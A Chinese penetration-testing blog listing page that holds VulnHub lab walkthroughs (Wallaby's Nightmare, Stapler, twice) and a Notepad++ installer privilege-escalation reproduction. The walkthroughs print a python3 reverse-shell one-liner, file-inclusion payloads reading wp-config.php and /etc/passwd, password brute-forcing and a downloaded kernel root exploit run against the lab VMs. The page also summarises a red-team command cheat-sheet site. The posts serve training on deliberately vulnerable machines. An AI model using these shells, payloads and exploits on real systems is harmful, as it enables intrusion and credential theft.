首页
工具导航
留言面板
友情链接
Search
1
【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用
7,866 阅读
2
2025最新渗透测试靶场推荐,新手必练的靶场推荐
5,158 阅读
3
src平台推荐,挖SRC必须知道的25个漏洞提交平台
4,322 阅读
4
几个常见的密码字典推荐
3,392 阅读
5
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
3,214 阅读
AI
OSCP打靶
安全服务
建站
泷羽收录
渗透学习
渗透工具
服务器
登录
Search
标签搜索
渗透测试
内网渗透
Linux
网络协议
vulnhub
SQL注入
靶场实战
提权
代理隧道
域渗透
信息收集
权限提升
WAF绕过
hackmyvm
AI安全
云安全
权限维持
红队攻击
蓝队防御
云服务
白小羽
累计撰写
188
篇文章
累计收到
0
条评论
首页
导航
工具导航
留言面板
友情链接
搜索到
33
篇与
的结果
2025-09-11
Nightmare (v1.0.2)-vulnhub靶机渗透
靶机下载地址:https://www.vulnhub.com/entry/wallabys-nightmare-v102,176/这是一个类似于ctf的机器,靠脑洞随便输入一个数字就行点击上面的start the ctf,就来到了这个界面,经过dirb,dirsearch的扫描之后没有其他有用的界面,就一个图片,那么漏洞点就很容易猜啦就是文件包含漏洞了,这样子看不好看我们使用curl命令就好了curl http://10.10.10.132/?page=/etc/passwd我包含了各种文件,直到包含到了这个knockd.conf然后80端口就关闭了。。。。之后这个80端口就关闭了,新开放了一个60080端口尝试访问一下看看看看图片有没有隐写信息,也是没有再来猜测一下,和首页一样,有一个page参数,也是猜测成功了!我们使用dirb进行文件包含的爆破直到mailer,又是一个新的界面了,并且下面还有一个提示信息我们抓包,尝试执行whoami!成功发现漏洞点!查看python的版本,包含了3,但是没有2那么就使用python3进行反弹shell吧export RHOST="10.10.10.128";export RPORT=1234;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'我是用uname -a的时候看到了系统信息比较老,可以使用藏牛提权!我们直接去github上下载藏牛的exp就好啦!至此提权成功啦往期推荐全网低价证书找我 + baibaixiaoyu2024包括且不限于cisp,cisp-pte,pts,cissp,cisp-ire,cisa,OSCP,osep等等往期推荐新版BurpSuite v2025.6.3汉化版,附激活教程Fine!2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具,全方位的目录爆破集成MemProcFS,Vol2和Vol3的内存取证神器重大更新!FeatherScan v4.5 内网 Linux 信息收集,提权一键梭哈神器x-WAF,一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具,一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备,microsocks,一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!一个永久的渗透知识库【OSCP】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透
2025年09月11日
1,025 阅读
0 评论
0 点赞
2025-09-11
Stapler-vulnhub靶机渗透
靶机地址:https://www.vulnhub.com/entry/stapler-1,150/靶机描述:Stapler is reported to be one of several vulnerable systems that are supposed to assist penetration testers with challenges similar to Offensive Security’s PWK coursework.这个靶机打开的时候呢需要选择“我已移动此虚拟机”否则可能打不开,或者导致网络错误我们在端口扫描的时候,就能看到FTP是允许匿名登录的除了80端口还有12380端口都是http服务我们对第一个http服务,也就是80端口进行目录扫描curl http://10.10.10.220/.profile curl http://10.10.10.220/.bashrc 使用上面的命令可以看到这些内容(没有什么东西)接下来我们使用FTP匿名登录有一个note笔记,把它get下来查看┌──(root㉿kali)-[~] └─# FTP 10.10.10.220 Connected to 10.10.10.220. 220- 220-|-----------------------------------------------------------------------------------------| 220-| Harry, make sure to update the banner when you get a chance to show who has access here | 220-|-----------------------------------------------------------------------------------------| 220- 220 Name (10.10.10.220:kali): FTP 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. FTP> ls 550 Permission denied. 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 0 0 107 Jun 03 2016 note 226 Directory send OK. FTP> cd note 550 Failed to change directory. FTP> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 0 0 107 Jun 03 2016 note 226 Directory send OK. FTP> get note local: note remote: note 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for note (107 bytes). 100% |*********************| 107 1.03 MiB/s 00:00 ETA 226 Transfer complete. 107 bytes received in 00:00 (110.69 KiB/s) FTP> exit 221 Goodbye. ┌──(root㉿kali)-[~] └─# cat note # 查看note Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.翻译结果如下没有找到有用的信息,我们来到12380端口的web,他报了一个400,使用目录扫描的时候也不正常我们增加一个https试试随后进行目录扫描dirsearch -u https://10.10.10.220:12380/包含了一个robots.txt还有phpmyadmin,但是我们不知道账号密码在phpmyadmin登录这里有一个“帮助”按钮点进去就有了phpmyadmin的版本信息这样子找找phpmyadmin的nday(利用过几个之后也没什么作用)我们打开目录扫描出来的robobts.txt,包含了两个目录,一个是后台界面的目录,一个是博客地址访问后台,缺弹出了一个框,看这个样子应该是被别人黑过,留下了一个xssbeef的payload使用whatweb识别cms是属于wordpress站点whatweb https://10.10.10.220:12380/blogblog/利用wordpress渗透工具wpscan,枚举可能存在的用户并使用这些用户名对后台进行爆破,使用kali中的seclists字典wpscan --url https://10.10.10.220:12380/blogblog/ -e u -P /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt爆破成功后应该会显示这四组账号密码wpscan --url https://10.10.10.220:12380/blogblog/ -e u -P /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt --disable-tls-checksgarry:football harry:monkey scott:cookie tim:thumb登录后台第一篇文章第二篇文章,还有第三篇文章,都没有什么用我们访问wordpress插件的目录(dirb,dirsearch都能扫出来)可以看到有三个插件来看第一个插件,他会有一个readme.txt版本是1.0在这里我们搜索这个插件的漏洞,额外找到了突破点我们尝试运行这个exp,报了一些错误,显示的是Connection refused即连接被拒绝我们查看一下他的源码我们修改这个内容sed -i 's|http://127.0.0.1/wordpress|https://10.10.10.220:12380/blogblog|g' 39646.py在这里解释一下sed命令,平时我也不怎么用,-i参数表示的是直接修改这个文件,由于url中包含了很多个/所以就换了个符号|进行分割,不然也可以使用/,s表示替换命令,最后面那个g表示全局替换,使用示例sed -i 's/原内容/新内容/g' # / 写法 sed -i 's|原内容|新内容|g' # | 写法此时我们就已经把想要替换掉的内容直接替换掉了此时又出现了一个问题,ssl错误,我们的靶机站点ssl错误了,不清楚怎么修改代码不要紧,我们使用他提供的poc手工打(这个漏洞脚本中有)下面这个poc是一个文件包含漏洞https://10.10.10.220:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php访问的时候出现了一个url,但是没有出现wp-config.php的文件内容https://10.10.10.220:12380/blogblog/?p=1180访问这个地址,显示了一个页面不存在的样子随后我找了半天,尝试了各种操作,在uploads中找到了不知不觉新增了几张图片https://10.10.10.220:12380/blogblog/wp-content/uploads/我访问其中一张图片的时候发现了数据库的密码 root : plbkac ,原来访问了那个文件包含的poc,在这里会生成几张图片,二这个图片的内容就是你包含的文件的内容!curl -k https://10.10.10.220:12380/blogblog/wp-content/uploads/2145541298.jpeg我们登录数据库,目标id为1的john解密 incorrecthttps://www.somd5.com/使用数据库密码和其他用户试试(同样使用文件包含漏洞,获取 /etc/passwd 文件内容),下面是可能的用户┌──(root㉿kali)-[/data/demo] └─# cat user.txt sync peter RNunemaker ETollefson DSwanger AParnell SHayslett MBassin JBare LSolum MFrei SStroud CCeaser JKanode CJoo JLipps jamie Sam Drew jess SHAY Taylor mel kai zoe NATHAN www elly使用这些用户,还有数据库的密码,进行爆破(猜测数据库密码是其中任意一个用户的名字)使用ssh进行登录使用featherscan,进行Linux信息收集git clone https://github.com/baibaixiaoyu2024/FeatherScan.git cd FeatherScan/FeatherScan_v4_5_/ chmod +x FeatherScan_v4_5 ./FeatherScan_v4_5发现了如下漏洞信息,如果仔细辨别名称的话,这个系统版本都不属于这些漏洞范围挑选了最可能存在的一个内核exp。提权失败了当然不能局限于这些内核漏洞,毕竟工具不能代替人工,随后找到了这个exp最后面有一个exp,我们去下载zoe@red:/tmp$ wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip zoe@red:/tmp$ ls 39772.zip FeatherScan searchsploit_commands_21765.sh vmware-root zoe@red:/tmp$ unzip 39772.zip Archive: 39772.zip creating: 39772/ inflating: 39772/.DS_Store creating: __MACOSX/ creating: __MACOSX/39772/ inflating: __MACOSX/39772/._.DS_Store inflating: 39772/crasher.tar inflating: __MACOSX/39772/._crasher.tar inflating: 39772/exploit.tar inflating: __MACOSX/39772/._exploit.tar zoe@red:/tmp$ ls 39772 39772.zip FeatherScan __MACOSX searchsploit_commands_21765.sh vmware-root zoe@red:/tmp$ cd 39772 zoe@red:/tmp/39772$ ls crasher.tar exploit.tar zoe@red:/tmp/39772$ tar -xvf exploit.tar ebpf_mapfd_doubleput_exploit/ ebpf_mapfd_doubleput_exploit/hello.c ebpf_mapfd_doubleput_exploit/suidhelper.c ebpf_mapfd_doubleput_exploit/compile.sh ebpf_mapfd_doubleput_exploit/doubleput.c zoe@red:/tmp/39772$ ls crasher.tar ebpf_mapfd_doubleput_exploit exploit.tar zoe@red:/tmp/39772$ cd e ebpf_mapfd_doubleput_exploit/ exploit.tar zoe@red:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit/ zoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls compile.sh doubleput.c hello.c suidhelper.c zoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh doubleput.c: In function ‘make_setuid’: doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] .insns = (__aligned_u64) insns, ^ doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] .license = (__aligned_u64)"" # 这里报错不要紧,不影响脚本正常编译 ^ zoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c zoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput starting writev woohoo, got pointer reuse writev returned successfully. if this worked, you'll have a root shell in <=60 seconds. whoami suid file detected, launching rootshell... we have root privs now... root@red:/tmp/39772/ebpf_mapfd_doubleput_exploit# whoami root至此提权成功!其他思路,在home下面发现了一个sudo用户peter,而且能够使用sudo查看历史命令,发现了另外两个用户的密码,其中包含了peter!能使用sudo!那么思路不就来了sshpass -p thisimypassword ssh JKanode@localhost sshpass -p JZQuyIN5 peter@localhost有了密码,使用sudo的时候发现sudo权限是all,那我们就能直接提权 sudo -i至此两种方法提权成功。感谢阅读至此的你,致敬~全网低价证书找我 + baibaixiaoyu2024包括且不限于cisp,cisp-pte,pts,cissp,cisp-ire,cisa,OSCP,osep等等往期推荐新版BurpSuite v2025.6.3汉化版,附激活教程挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备,microsocks,一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!一个永久的渗透知识库【OSCP】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透
2025年09月11日
1,448 阅读
0 评论
0 点赞
2025-08-13
VulnHub-STAPLER: 1 内核&sudo提权
靶机地址:https://www.vulnhub.com/entry/stapler-1,150/靶机描述:Stapler is reported to be one of several vulnerable systems that are supposed to assist penetration testers with challenges similar to Offensive Security’s PWK coursework.这个靶机打开的时候呢需要选择“我已移动此虚拟机”否则可能打不开,或者导致网络错误我们在端口扫描的时候,就能看到FTP是允许匿名登录的除了80端口还有12380端口都是http服务我们对第一个http服务,也就是80端口进行目录扫描curl http://10.10.10.220/.profilecurl http://10.10.10.220/.bashrc使用上面的命令可以看到这些内容(没有什么东西)接下来我们使用FTP匿名登录有一个note笔记,把它get下来查看┌──(root㉿kali)-[~]└─# FTP 10.10.10.220Connected to 10.10.10.220.220-220-|-----------------------------------------------------------------------------------------|220-| Harry, make sure to update the banner when you get a chance to show who has access here |220-|-----------------------------------------------------------------------------------------|220-220Name (10.10.10.220:kali): FTP331 Please specify the password.Password:230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.FTP> ls550 Permission denied.200 PORT command successful. Consider using PASV.150 Here comes the directory listing.-rw-r--r-- 1 0 0 107 Jun 03 2016 note226 Directory send OK.FTP> cd note550 Failed to change directory.FTP> ls200 PORT command successful. Consider using PASV.150 Here comes the directory listing.-rw-r--r-- 1 0 0 107 Jun 03 2016 note226 Directory send OK.FTP> get notelocal: note remote: note200 PORT command successful. Consider using PASV.150 Opening BINARY mode data connection for note (107 bytes).100% |*********************| 107 1.03 MiB/s 00:00 ETA226 Transfer complete.107 bytes received in 00:00 (110.69 KiB/s)FTP> exit221 Goodbye.┌──(root㉿kali)-[~]└─# cat note # 查看noteElly, make sure you update the payload information. Leave it in your FTP account once your are done, John.翻译结果如下没有找到有用的信息,我们来到12380端口的web,他报了一个400,使用目录扫描的时候也不正常我们增加一个https试试随后进行目录扫描dirsearch -u https://10.10.10.220:12380/包含了一个robots.txt还有phpmyadmin,但是我们不知道账号密码在phpmyadmin登录这里有一个“帮助”按钮点进去就有了phpmyadmin的版本信息 这样子找找phpmyadmin的nday(利用过几个之后也没什么作用)我们打开目录扫描出来的robobts.txt,包含了两个目录,一个是后台界面的目录,一个是博客地址访问后台,缺弹出了一个框,看这个样子应该是被别人黑过,留下了一个xssbeef的payload使用whatweb识别cms是属于wordpress站点whatweb https://10.10.10.220:12380/blogblog/利用wordpress渗透工具wpscan,枚举可能存在的用户并使用这些用户名对后台进行爆破,使用kali中的seclists字典wpscan --url https://10.10.10.220:12380/blogblog/ -e u -P /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt爆破成功后应该会显示这四组账号密码wpscan --url https://10.10.10.220:12380/blogblog/ -e u -P /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt --disable-tls-checksgarry:footballharry:monkeyscott:cookietim:thumb登录后台第一篇文章第二篇文章,还有第三篇文章,都没有什么用我们访问wordpress插件的目录(dirb,dirsearch都能扫出来)可以看到有三个插件来看第一个插件,他会有一个readme.txt版本是1.0在这里我们搜索这个插件的漏洞,额外找到了突破点我们尝试运行这个exp,报了一些错误,显示的是Connection refused即连接被拒绝我们查看一下他的源码我们修改这个内容sed -i 's|http://127.0.0.1/wordpress|https://10.10.10.220:12380/blogblog|g' 39646.py在这里解释一下sed命令,平时我也不怎么用,-i参数表示的是直接修改这个文件,由于url中包含了很多个/所以就换了个符号|进行分割,不然也可以使用/,s表示替换命令,最后面那个g表示全局替换,使用示例sed -i 's/原内容/新内容/g' # / 写法sed -i 's|原内容|新内容|g' # | 写法此时我们就已经把想要替换掉的内容直接替换掉了此时又出现了一个问题,ssl错误,我们的靶机站点ssl错误了,不清楚怎么修改代码不要紧,我们使用他提供的poc手工打(这个漏洞脚本中有)下面这个poc是一个文件包含漏洞https://10.10.10.220:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php访问的时候出现了一个url,但是没有出现wp-config.php的文件内容https://10.10.10.220:12380/blogblog/?p=1180访问这个地址,显示了一个页面不存在的样子随后我找了半天,尝试了各种操作,在uploads中找到了不知不觉新增了几张图片https://10.10.10.220:12380/blogblog/wp-content/uploads/我访问其中一张图片的时候发现了数据库的密码root : plbkac,原来访问了那个文件包含的poc,在这里会生成几张图片,二这个图片的内容就是你包含的文件的内容!curl -k https://10.10.10.220:12380/blogblog/wp-content/uploads/2145541298.jpeg我们登录数据库,目标id为1的john解密 incorrecthttps://www.somd5.com/使用数据库密码和其他用户试试(同样使用文件包含漏洞,获取/etc/passwd文件内容),下面是可能的用户┌──(root㉿kali)-[/data/demo]└─# cat user.txtsyncpeterRNunemakerETollefsonDSwangerAParnellSHayslettMBassinJBareLSolumMFreiSStroudCCeaserJKanodeCJooJLippsjamieSamDrewjessSHAYTaylormelkaizoeNATHANwwwelly使用这些用户,还有数据库的密码,进行爆破(猜测数据库密码是其中任意一个用户的名字)使用ssh进行登录使用featherscan,进行Linux信息收集git clone https://github.com/baibaixiaoyu2024/FeatherScan.gitcd FeatherScan/FeatherScan_v4_5_/chmod +x FeatherScan_v4_5./FeatherScan_v4_5发现了如下漏洞信息,如果仔细辨别名称的话,这个系统版本都不属于这些漏洞范围挑选了最可能存在的一个内核exp。提权失败了当然不能局限于这些内核漏洞,毕竟工具不能代替人工,随后找到了这个exp最后面有一个exp,我们去下载zoe@red:/tmp$ wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zipzoe@red:/tmp$ ls39772.zip FeatherScan searchsploit_commands_21765.sh vmware-rootzoe@red:/tmp$ unzip 39772.zipArchive: 39772.zip creating: 39772/inflating: 39772/.DS_Store creating: __MACOSX/ creating: __MACOSX/39772/inflating: __MACOSX/39772/._.DS_Storeinflating: 39772/crasher.tarinflating: __MACOSX/39772/._crasher.tarinflating: 39772/exploit.tarinflating: __MACOSX/39772/._exploit.tarzoe@red:/tmp$ ls39772 39772.zip FeatherScan __MACOSX searchsploit_commands_21765.sh vmware-rootzoe@red:/tmp$ cd 39772zoe@red:/tmp/39772$ lscrasher.tar exploit.tarzoe@red:/tmp/39772$ tar -xvf exploit.tarebpf_mapfd_doubleput_exploit/ebpf_mapfd_doubleput_exploit/hello.cebpf_mapfd_doubleput_exploit/suidhelper.cebpf_mapfd_doubleput_exploit/compile.shebpf_mapfd_doubleput_exploit/doubleput.czoe@red:/tmp/39772$ lscrasher.tar ebpf_mapfd_doubleput_exploit exploit.tarzoe@red:/tmp/39772$ cd eebpf_mapfd_doubleput_exploit/ exploit.tarzoe@red:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit/zoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ lscompile.sh doubleput.c hello.c suidhelper.czoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$./compile.shdoubleput.c: In function ‘make_setuid’:doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] .insns = (__aligned_u64) insns, ^doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] .license = (__aligned_u64)"" # 这里报错不要紧,不影响脚本正常编译 ^zoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ lscompile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.czoe@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$./doubleputstarting writevwoohoo, got pointer reusewritev returned successfully. if this worked, you'll have a root shell in <=60 seconds.whoamisuid file detected, launching rootshell...we have root privs now...root@red:/tmp/39772/ebpf_mapfd_doubleput_exploit# whoamiroot至此提权成功!其他思路,在home下面发现了一个sudo用户peter,而且能够使用sudo查看历史命令,发现了另外两个用户的密码,其中包含了peter!能使用sudo!那么思路不就来了sshpass -p thisimypassword ssh JKanode@localhostsshpass -p JZQuyIN5 peter@localhost有了密码,使用sudo的时候发现sudo权限是all,那我们就能直接提权 sudo -i至此两种方法提权成功。感谢阅读至此的你,致敬~往期推荐新版BurpSuite v2025.6.3汉化版,附激活教程挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备,microsocks,一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!一个永久的渗透知识库【OSCP】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透
2025年08月13日
1,069 阅读
0 评论
0 点赞
2025-07-23
红队命令速查手册
站点:https://book.shentoushi.top/核心作用:这个站点的核心目标是解决红队行动和渗透测试过程中面临的“命令记忆痛点”,充当一个集中化的、快速查询的实战命令速查手册。它将自己定位为安全从业者(尤其是红队成员)的“技术备忘录”和“效率工具”。功能详解:命令的全面整合与分类:站点最显著的功能是将红队渗透中常用的、零散的命令进行了系统性的收集和分类。这涵盖了:操作系统基础命令:明确区分Win命令(Windows) 和Linux命令,这是渗透工作的底层基础。核心安全工具指令:专门整理了wmic,powershell,mimikatz(及其相关变种),metasploit(框架及其常用模块),cobalt strike(及其相关工具)等重量级工具的常用命令和操作语法。掌握这些工具的命令是红队工作的核心技能。专项技术领域命令:隧道代理 (隧道代理工具):整理用于端口转发、代理、内网穿透等场景的工具命令。Web渗透 (Web渗透技巧):包含针对 Web 应用的常见攻击手段和工具命令。内网渗透 (内网渗透):细分为信息收集 (Information)、横向移动 (Win/Linux_LateralMovement)、以及利用impacket工具集进行内网渗透的命令。LOLBins (Lolbin介绍):收集利用 Windows (Win_Lolbin) 和 Linux (Linux_Lolbin) 系统自带合法程序 (Living-off-the-Land Binaries) 进行攻击或绕过检测的技巧与命令组合。凭证提取 (Credential介绍):专门章节讲解如dump_lsass和dump_lsa等关键凭证提取技术的命令和方法。权限提升 (Privilege介绍):整理系统提权 (Privilege_Escalation) 的常用命令和技巧。数据库操作 (数据库命令):覆盖主流数据库 (Mssql,Mysql,Oracle,PostgreSql,Redis) 在渗透中常用的连接、查询、命令执行等语句。编程相关 (编程常用命令):提供Go,Nim,Rust,Python等红队常用开发或利用语言的代码片段或编译命令 (Go,Nim,RustCode,PythonCode)。反病毒规避 (Anti Virus介绍):提供针对常见安全产品(如Kaspersky,Defender,Avast,SangforEDR,Asiainfo,Dbappsecurity,Skylar,HipsTray)的规避技巧或相关命令参考(虽然可能不是直接的绕过命令,但包含相关上下文)。结构清晰,便于速查:网站采用层级目录结构(如“系统命令 > Win命令收集”),逻辑清晰。用户可以根据当前的操作环境(Windows/Linux)、使用的工具(Metasploit/Cobalt Strike)、执行的任务(信息收集/横向移动/提权/凭证窃取)或针对的目标(数据库/特定 AV)快速导航到对应的命令集合。顶部的“手册 (手册)”部分进一步提炼了渗透常用命令,可能是最精华、最高频命令的快速索引。聚焦实战,解决实际问题:其内容直接来源于红队实践中积累的需求。整合系统命令、工具命令、专项技术命令的目的,就是为了让安全工程师在紧张的渗透测试或红队演练中,能快速找到并验证需要执行的命令,避免因记忆模糊或查找资料浪费时间,甚至出错。例如,忘记某个特定的mimikatz参数或一个用于数据库提权的特定 SQL 查询,都可以在这里查找。作为知识库的补充 (Wiki):关联的 Wiki (https://wiki.shentoushi.top/) 表明该站点可能是一个更广泛知识体系的一部分。主站点 (book.shentoushi.top) 专注于命令速查,而 Wiki 可能承载更深入的技术原理、战术讲解、工具分析或开源项目 (github安全开源项目) 的详细文档。总结:RedTeam And Command(https://book.shentoushi.top) 是一个高度实用主义导向的网站。它不做冗长的理论阐述,而是将红队和渗透测试人员在日常工作中最常需要、最容易遗忘的各种系统命令、工具指令、专项技术操作语句进行了系统化的归类和呈现。它本质上是一个为提升安全工程师操作效率而生的“红队实战命令速查字典”和“专项技术命令手册”,其价值在于让用户能快速定位并准确执行所需的命令,从而更流畅地完成复杂的渗透任务。关联的 Wiki 站点则可能提供更深层次的技术背景支持。往期推荐新版BurpSuite v2025.6.3汉化版,附激活教程挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备,microsocks,一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5,Windows内网渗透,社工提权,多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!一个永久的渗透知识库【OSCP】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,Windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透
2025年07月23日
1,439 阅读
0 评论
0 点赞
2025-06-24
Notepad++ v8.8.1 本地提权复现
测试环境为,windows server 2016 + 渗透工具 CSnotepad++下载地址https://www.lanzouo.com/b621509首先打开kali,正常开启我们的cs服务器本机打开cs创建一个windows可执行程序创建一个监听器选择监听器生成后将木马修改为regsvr32.exe/ 必须而当我们使用此安装程序进行安装的时候,默认需要管理员权限才能安装,需要我们输入密码上线,权限是管理员权限,而我们cmd中显示的是demo普通用户,上线的用户是administrator,而不是系统权限,那么在真实渗透过程中,我们都知道了管理员的密码了,还需要这个notepad++的安装包么,显然不需要。。。下面是官方的复现视频(直接nc反弹shell就是system,可能是因为我太菜了。。。。。)https://drive.google.com/drive/folders/11yeUSWgqHvt4Bz5jO3ilRRfcpQZ6Gvpn攻击总结攻击方法分为以下几个步骤:准备阶段:攻击者在目标系统当前工作目录中放置一个恶意的regsvr32.exe文件攻击向量:用户运行 Notepad++ v8.8.1 的安装程序。执行阶段:安装程序调用regsvr32时,从当前工作目录加载恶意文件,并以 管理员(administrator) 